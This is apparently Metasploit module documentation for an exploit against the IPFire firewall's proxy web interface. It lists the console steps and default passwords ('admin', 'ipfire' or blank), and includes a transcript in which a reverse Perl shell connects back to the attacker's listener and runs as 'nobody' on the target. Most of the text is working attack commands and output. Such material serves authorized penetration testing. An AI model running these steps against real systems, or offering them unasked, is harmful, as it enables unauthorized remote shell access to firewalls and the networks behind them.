1.5 KiB
1.5 KiB
Vulnerable Application
Official Source: ipfire Archived Copy: github
Verification Steps
- Install the firewall
- Start msfconsole
- Do:
use exploit/linux/http/ipfire_proxy_exec
- Do:
set password admin
or whatever it was set to at install - Do:
set rhost 10.10.10.10
- Do:
set payload cmd/unix/reverse_perl
- Do:
set lhost 192.168.2.229
- Do:
exploit
- You should get a shell.
Options
PASSWORD
Password is set at install. May be blank, 'admin', or 'ipfire'.
Scenarios
msf > use exploit/linux/http/ipfire_proxy_exec
msf exploit(ipfire_proxy_rce) > set password admin
password => admin
msf exploit(ipfire_proxy_rce) > set rhost 192.168.2.201
rhost => 192.168.2.201
msf exploit(ipfire_proxy_rce) > set payload cmd/unix/reverse_perl
payload => cmd/unix/reverse_perl
msf exploit(ipfire_proxy_rce) > set verbose true
verbose => true
msf exploit(ipfire_proxy_rce) > set lhost 192.168.2.229
lhost => 192.168.2.229
msf exploit(ipfire_proxy_rce) > exploit
[*] Started reverse TCP handler on 192.168.2.229:4444
[*] Command shell session 1 opened (192.168.2.229:4444 -> 192.168.2.201:49997) at 2016-05-30 10:09:39 -0400
id
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
whoami
nobody